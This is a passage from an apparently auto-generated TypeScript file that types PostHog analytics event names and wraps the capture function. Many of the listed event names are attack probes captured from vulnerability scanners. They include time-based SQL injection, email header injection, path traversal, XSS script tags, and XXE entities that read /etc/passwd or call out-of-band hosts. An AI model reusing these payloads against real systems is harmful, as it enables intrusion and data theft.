    test_event_from_curl: Record<string, any>
    'test event juraj': Record<string, any>
    test_event_YBhtbPXTcc: Record<string, any>
    test_from_console: Record<string, any>
    'test-id': Record<string, any>
    'test installation survey sent': Record<string, any>
    'test installation survey shown': Record<string, any>
    test_ph_alerted_issue: Record<string, any>
    test_ph_bug_detection_poc: Record<string, any>
    'test property flattener': Record<string, any>
    'test.stripe.charge.successful': Record<string, any>
    'test-tiina': Record<string, any>
    test_timing_event: Record<string, any>
    'test ts 38438': Record<string, any>
    'test user signed up': Record<string, any>
    TEST_WITH_ID: Record<string, any>
    "Tgfd7yXy'; waitfor delay '0:0:15' -- ": Record<string, any>
    thing: Record<string, any>
    'thrifty billing pageview': Record<string, any>
    'thrifty billing pageviews': Record<string, any>
    'tiina-test-event': Record<string, any>
    'time to see data': Record<string, any>
    'timezone component viewed': Record<string, any>
    'timezone team setting updated': Record<string, any>
    timssecretevent: Record<string, any>
    timssecretevent2: Record<string, any>
    timssecretevent3django: Record<string, any>
    timssecretevent4: Record<string, any>
    "#{T(java.net.InetAddress).getByName('615vmbw0g1tagrrn2k7i7t1ev51xpsggadybqygl79w.oastify.com.')}": Record<
        string,
        any
    >
    tmQFjja5: Record<string, any>
    '@@TnMXR': Record<string, any>
    'toast error': Record<string, any>
    'toast warning': Record<string, any>
    'Toby Donnelly': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-3497.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-3678.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-3788.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4024.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4262.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4529.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4648.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4774.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4862.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-4959.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5023.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5091.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5218.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5282.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5348.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5440.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5506.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-5577.1579.51c81.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.1579-9119.1579.103ea.19682.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-2369.907.0b2e5.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-2499.907.0b2e5.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-2661.907.eeb01.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3332.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3541.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3675.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3779.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3883.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-3991.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-4095.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-4210.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-4314.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-4504.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:009247.907-5713.907.7c001.19109.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:074625.48-2123.48.3e3e0.19647.2@bxss.me': Record<string, any>
    'to@example.com>%0d%0abcc:074625.48-2187.48.975e1.19647.2@bxss.me': Record<string, any>
    '@@tofFr': Record<string, any>
    token_autofilled: Record<string, any>
    'Tomas Nikolaus': Record<string, any>
    'toolbar authenticate': Record<string, any>
    'Toolbar Authenticated': Record<string, any>
    'Toolbar Button Mode': Record<string, any>
    'Toolbar Closed': Record<string, any>
    'Toolbar Dock Mode': Record<string, any>
    'toolbar dragged': Record<string, any>
    'toolbar feature flag overridden': Record<string, any>
    'toolbar feature flag override removed': Record<string, any>
    'toolbar launch': Record<string, any>
    'toolbar loaded': Record<string, any>
    'toolbar logout': Record<string, any>
    toolbar_manual_selector_applied: Record<string, any>
    toolbar_manual_selector_modal_opened: Record<string, any>
    'toolbar mode triggered': Record<string, any>
    'Toolbar Pre-Authorize': Record<string, any>
    'toolbar selected HTML element': Record<string, any>
    toolbar_selector_quality_warning_shown: Record<string, any>
    'toolbar set extension percentage': Record<string, any>
    'toolbar token expired': Record<string, any>
    'Torey Will': Record<string, any>
    'transactional email': Record<string, any>
    'transactional email failure': Record<string, any>
    'Travis Streich': Record<string, any>
    'Trigger CSM outreach survey': Record<string, any>
    "TsqwGI2J' OR 530=(SELECT 530 FROM PG_SLEEP(15))--": Record<string, any>
    "tuQJQBwv')) OR 95=(SELECT 95 FROM PG_SLEEP(15))--": Record<string, any>
    'tutorial skipped': Record<string, any>
    '@@tVxso': Record<string, any>
    twitter_followers: Record<string, any>
    '@@tWPrv': Record<string, any>
    'Tyree Cruickshank': Record<string, any>
    U1nbZePA: Record<string, any>
    u7A38ZC5: Record<string, any>
    "UIUyLNED'; waitfor delay '0:0:15' -- ": Record<string, any>
    ukJsHdCD: Record<string, any>
    unique_test: Record<string, any>
    'Upcoming Billings': Record<string, any>
    'Upcoming Invoice': Record<string, any>
    'Upcoming Invoice – Above Threshold': Record<string, any>
    'Upcoming Invoices (Aggregated)': Record<string, any>
    update_all_orgs_billing_quotas: Record<string, any>
    update_all_orgs_billing_quotas_dev: Record<string, any>
    update_all_orgs_billing_quotas_eu: Record<string, any>
    update_all_orgs_billing_quotas_unknown: Record<string, any>
    update_all_orgs_billing_quotas_us: Record<string, any>
    'Updated Stripe Customer': Record<string, any>
    'update_org_billing_quotas finished': Record<string, any>
    'update_org_billing_quotas started': Record<string, any>
    'update_quota_limiting task failed': Record<string, any>
    'update_quota_limiting task started': Record<string, any>
    'update user properties': Record<string, any>
    'upgrade modal cancellation': Record<string, any>
    'upgrade modal pricing interaction': Record<string, any>
    'upgrade modal shown': Record<string, any>
    'usage reports complete': Record<string, any>
    'usage reports - sending complete': Record<string, any>
    'usage reports starting': Record<string, any>
    'usage reports - starting to send': Record<string, any>
    usd_to_brl: Record<string, any>
    'user account deleted': Record<string, any>
    'user changed personsOnEventsMode setting': Record<string, any>
    'user instance status report': Record<string, any>
    'user instance status report failure': Record<string, any>
    'User Interview Clicked Book Button': Record<string, any>
    'User Interview Dismissed Pop Up': Record<string, any>
    'User Interview Shown Pop Up': Record<string, any>
    'user invited': Record<string, any>
    'user joined from invite': Record<string, any>
    'user joined organization': Record<string, any>
    'user joined project': Record<string, any>
    'User joined Slack Connect': Record<string, any>
    'user logged in': Record<string, any>
    user_login: Record<string, any>
    'user moved feature preview stage': Record<string, any>
    'user password reset': Record<string, any>
    user_searched: Record<string, any>
    'user showed product intent': Record<string, any>
    'user signed up': Record<string, any>
    user_signed_up: Record<string, any>
    user_signed_up_to_newsletter: Record<string, any>
    user_signed_up_to_newsletter_from_ad: Record<string, any>
    user_signup: Record<string, any>
    'user updated': Record<string, any>
    'user verified email': Record<string, any>
    uU8SvaXn: Record<string, any>
    UweSiJOf: Record<string, any>
    "uwRyAtqR') OR 522=(SELECT 522 FROM PG_SLEEP(15))--": Record<string, any>
    'v1 session recording snapshots viewed': Record<string, any>
    "v1ua''urgy": Record<string, any>
    'v2 session recording snapshots viewed': Record<string, any>
    "vAcc2ufA')) OR 823=(SELECT 823 FROM PG_SLEEP(15))--": Record<string, any>
    'valentines day - Find out more': Record<string, any>
    'valentines day - Give a star': Record<string, any>
    'validate_data_warehouse_table_columns errored': Record<string, any>
    'validate_data_warehouse_table_columns succeeded': Record<string, any>
    'verification email sent': Record<string, any>
    'Vernie Padberg': Record<string, any>
    VEVZWI3m: Record<string, any>
    video_played: Record<string, any>
    'viewed dashboard': Record<string, any>
    'viewed playlist': Record<string, any>
    viewed_posthog_analytics: Record<string, any>
    'viewed recordings from experiment': Record<string, any>
    'viewed recordings from feature flag': Record<string, any>
    'viewed toolbar element': Record<string, any>
    'visited billing customer portal': Record<string, any>
    'visitor has android events': Record<string, any>
    'vitally owners sync completed': Record<string, any>
    "vk9dCtvG') OR 358=(SELECT 358 FROM PG_SLEEP(15))--": Record<string, any>
    "vl5X3WeK' OR 605=(SELECT 605 FROM PG_SLEEP(15))--": Record<string, any>
    "vR4jpbi1')) OR 98=(SELECT 98 FROM PG_SLEEP(15))--": Record<string, any>
    "vTDA2vmm'; waitfor delay '0:0:15' -- ": Record<string, any>
    "vUvVS632' OR 196=(SELECT 196 FROM PG_SLEEP(15))--": Record<string, any>
    VVrnXVKt: Record<string, any>
    vYHYaTK6: Record<string, any>
    '@@W2sEI': Record<string, any>
    "W8UOPc9b'; waitfor delay '0:0:15' -- ": Record<string, any>
    "W9QAgyLV') OR 739=(SELECT 739 FROM PG_SLEEP(15))--": Record<string, any>
    'warehouse credentials invalid': Record<string, any>
    'web_analytics_pre_aggregated_tables_enabled team setting updated': Record<string, any>
    'web search category refine': Record<string, any>
    'web search closed': Record<string, any>
    'web search opened': Record<string, any>
    'web search result clicked': Record<string, any>
    'web search result heading clicked': Record<string, any>
    'week_start_day team setting updated': Record<string, any>
    "WfTtzqQz')) OR 514=(SELECT 514 FROM PG_SLEEP(15))--": Record<string, any>
    '../../../../../../../../../../../../../../windows/win.ini': Record<string, any>
    'wizard-agent-integration-start': Record<string, any>
    'wizard-agent-success': Record<string, any>
    'wizard interaction': Record<string, any>
    'workflows workflow event conversion clicked': Record<string, any>
    wrEbEzsu: Record<string, any>
    "WRuTg9Kp'; waitfor delay '0:0:15' -- ": Record<string, any>
    Wue2xJH7: Record<string, any>
    "wUpYl6DK'; waitfor delay '0:0:15' -- ": Record<string, any>
    x: Record<string, any>
    "x0grZGBU') OR 122=(SELECT 122 FROM PG_SLEEP(15))--": Record<string, any>
    "x6mn0DT6'; waitfor delay '0:0:15' -- ": Record<string, any>
    'Xander Huels': Record<string, any>
    "XbErvBbT')) OR 76=(SELECT 76 FROM PG_SLEEP(15))--": Record<string, any>
    "xBP4HPuM') OR 397=(SELECT 397 FROM PG_SLEEP(15))--": Record<string, any>
    Xce3gbO4: Record<string, any>
    XCKCXWaJ: Record<string, any>
    '/xfs.bxss.me': Record<string, any>
    'xfs.bxss.me': Record<string, any>
    '@@xIPQm': Record<string, any>
    "xJrlG2j3'; waitfor delay '0:0:15' -- ": Record<string, any>
    "xks0B5cs'; waitfor delay '0:0:15' -- ": Record<string, any>
    '{!xmlparser v=\'<!DOCTYPE a SYSTEM "http://aaoy0zd3m2cj59d2jiq42gs61x7nvc.oastify.com/xxe"><a></a>\'}': Record<
        string,
        any
    >
    '<?xml version="1.0" ?><!DOCTYPE r [<!ENTITY sp SYSTEM "file:///etc/passwd">]><r>&sp;</r>': Record<string, any>
    '<?xml version="1.0"?>\n<!DOCTYPE root [\n  <!ENTITY % xxe SYSTEM "http://d1i6a470ij9st0lf6cg0ybg4chmdsd5km.xfil.xbow.ltd/api_key_xxe.dtd">\n  %xxe;\n]>\n<data>test</data>': Record<
        string,
        any
    >
    "XPTuOALv' OR 843=(SELECT 843 FROM PG_SLEEP(15))--": Record<string, any>
    xss_probe_event: Record<string, any>
    xss_test_003_solver_e180772163_svg: Record<string, any>
    xss_test_uuid_011_solver_ffc5067d70: Record<string, any>
    '<xty xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://shdh2xcmwn9wwd79i6n4nfh0brhj5ew2wquih84zso.oastify.com/xty.xsd">xty</xty>': Record<
        string,
        any
    >
    "XxrFe0bk') OR 391=(SELECT 391 FROM PG_SLEEP(15))--": Record<string, any>
    "Y68I4MdP')) OR 955=(SELECT 955 FROM PG_SLEEP(15))--": Record<string, any>
    "y73PVFuS')) OR 332=(SELECT 332 FROM PG_SLEEP(15))--": Record<string, any>
    'yakkos-event-123': Record<string, any>
    'yakko-test-2022-11-25': Record<string, any>
    'yakko-test-2022-24-11': Record<string, any>
    'yakko-test-2022-25-11': Record<string, any>
    'yakko-testing': Record<string, any>
    ycwKpZRc: Record<string, any>
    'year in posthog viewed': Record<string, any>
    YPczLbFf: Record<string, any>
    "YqCZlnc9'; waitfor delay '0:0:15' -- ": Record<string, any>
    "YRPhdTzI')) OR 80=(SELECT 80 FROM PG_SLEEP(15))--": Record<string, any>
    YX5txyBQ: Record<string, any>
    "YXSsHk4F'; waitfor delay '0:0:15' -- ": Record<string, any>
    "yzL1BmBl') OR 358=(SELECT 358 FROM PG_SLEEP(15))--": Record<string, any>
    "z0epk05p') OR 851=(SELECT 851 FROM PG_SLEEP(15))--": Record<string, any>
    "z2UmwtX2'; waitfor delay '0:0:15' -- ": Record<string, any>
    "Z7NOXg0y'; waitfor delay '0:0:15' -- ": Record<string, any>
    "zAbP82eQ'; waitfor delay '0:0:15' -- ": Record<string, any>
    "zBO3W7DR') OR 180=(SELECT 180 FROM PG_SLEEP(15))--": Record<string, any>
    '@@Zcbj6': Record<string, any>
    zendesk_ticket: Record<string, any>
    'zfio04atuu73uk5ggdlblmf79yfq3lu9m4a22pscj08@oastify.com': Record<string, any>
    "ZHnw2NTe')) OR 610=(SELECT 610 FROM PG_SLEEP(15))--": Record<string, any>
    '@@zIVlw': Record<string, any>
    "zK1KSXu3') OR 11=(SELECT 11 FROM PG_SLEEP(15))--": Record<string, any>
    '@@zKJqo': Record<string, any>
    'Zoom: meeting.participant_joined': Record<string, any>
    "ZU4JZ2rx' OR 613=(SELECT 613 FROM PG_SLEEP(15))--": Record<string, any>
    ZUuFZVAj: Record<string, any>
    '\'"()&%<zzz><ScRiPt >05jF(9801)</ScRiPt>': Record<string, any>
    '\'"()&%<zzz><ScRiPt >9tz5(9588)</ScRiPt>': Record<string, any>
    工具栏令牌已过期: Record<string, any>
    工具栏已加载: Record<string, any>
    工具栏模式触发: Record<string, any>
    工具栏注销: Record<string, any>
}
// Type alias for all valid event names
export type EventName = keyof EventSchemas

// Type helper to get properties for a specific event
// Intersects the schema with Record<string, any> to allow additional properties
export type EventProperties<K extends EventName> = EventSchemas[K] & Record<string, any>

// Helper type to check if a type has required properties
type HasRequiredProperties<K extends EventName> = {} extends EventSchemas[K] ? false : true

// Helper to detect if T is exactly 'string' (not a literal)
type IsExactlyString<T> = string extends T ? (T extends string ? true : false) : false

// Enhanced PostHog interface with typed capture
interface TypedPostHog extends Omit<OriginalPostHog, 'capture'> {
    /**
     * Type-safe capture for defined events, or flexible capture for undefined events
     *
     * Note: For defined events, wrap properties in a variable to allow additional properties:
     * const props = { file_size_b: 100, extra: 'data' }
     * posthog.capture('downloaded_file', props)
     *
     * @example
     * // Defined event with type safety
     * posthog.capture('uploaded_file', {
     *   file_name: 'test.txt',
     *   file_size_b: 100
     * })
     *
     * @example
     * // For events with all optional properties, properties argument is optional
     * posthog.capture('logged_out') // no properties needed
     *
     * @example
     * // Undefined events work with arbitrary properties
     * posthog.capture('custom_event', { whatever: 'data' })
     * posthog.capture('another_event') // or no properties
     */
    // Overload 1: For known events (specific EventName literals)
    // This should match first for all known event names
    capture<K extends EventName>(
        event_name: K,
        ...args: HasRequiredProperties<K> extends true
            ? [properties: EventProperties<K>, options?: CaptureOptions]
            : [properties?: EventProperties<K>, options?: CaptureOptions]
    ): CaptureResult | undefined

    // Overload 2: For undefined events and blocking string variables
    // Only matches if event_name is NOT a known EventName
    // The conditional type rejects broad string type
    capture<T extends string>(
        event_name: IsExactlyString<T> extends true ? never : T extends EventName ? never : T,
        properties?: Properties | null,
        options?: CaptureOptions
    ): CaptureResult | undefined

    /**
     * Raw capture for any event (original behavior, no type checking)
     *
     * Use capture() for type-safe defined events or flexible undefined events.
     * Use captureRaw() only when you need to bypass all type checking.
     *
     * @example
     * posthog.captureRaw('Any Event Name', { whatever: 'data' })
     */
    captureRaw(event_name: string, properties?: Properties | null, options?: CaptureOptions): CaptureResult | undefined
}

// Create the implementation
const createTypedPostHog = (original: OriginalPostHog): TypedPostHog => {
    // Create the enhanced PostHog object
    const enhanced: TypedPostHog = Object.create(original)

    // Add capture method (type-safe for defined events, flexible for undefined)
    enhanced.capture = function (event_name: string, ...args: any[]): CaptureResult | undefined {
        const [properties, options] = args
        return original.capture(event_name, properties, options)
    }

    // Add captureRaw method for untyped/flexible event tracking
    enhanced.captureRaw = function (
        event_name: string,
        properties?: Properties | null,
        options?: CaptureOptions
    ): CaptureResult | undefined {
        return original.capture(event_name, properties, options)
    }

    // Proxy to delegate all other properties/methods to the original
    return new Proxy(enhanced, {
        get(target, prop) {
            if (prop in target) {
                return (target as any)[prop]
            }
            return (original as any)[prop]
        },
        set(_target, prop, value) {
            ;(original as any)[prop] = value
            return true
        },
    })
}

// Create and export the typed instance
const posthog = createTypedPostHog(originalPostHog as OriginalPostHog)

export default posthog
export type { EventSchemas, TypedPostHog }

// Re-export everything else from posthog-js
export * from 'posthog-js'

/**
 * USAGE GUIDE
 * ===========
 *
 * For type-safe defined events (recommended):
 *   posthog.capture('uploaded_file', { file_name: 'test.txt', file_size_b: 100 })
 *
 * For undefined events (flexible):
 *   posthog.capture('Custom Event', { whatever: 'data' })
 *
 * For bypassing all type checking (rare):
 *   posthog.captureRaw('Any Event', { whatever: 'data' })
 */
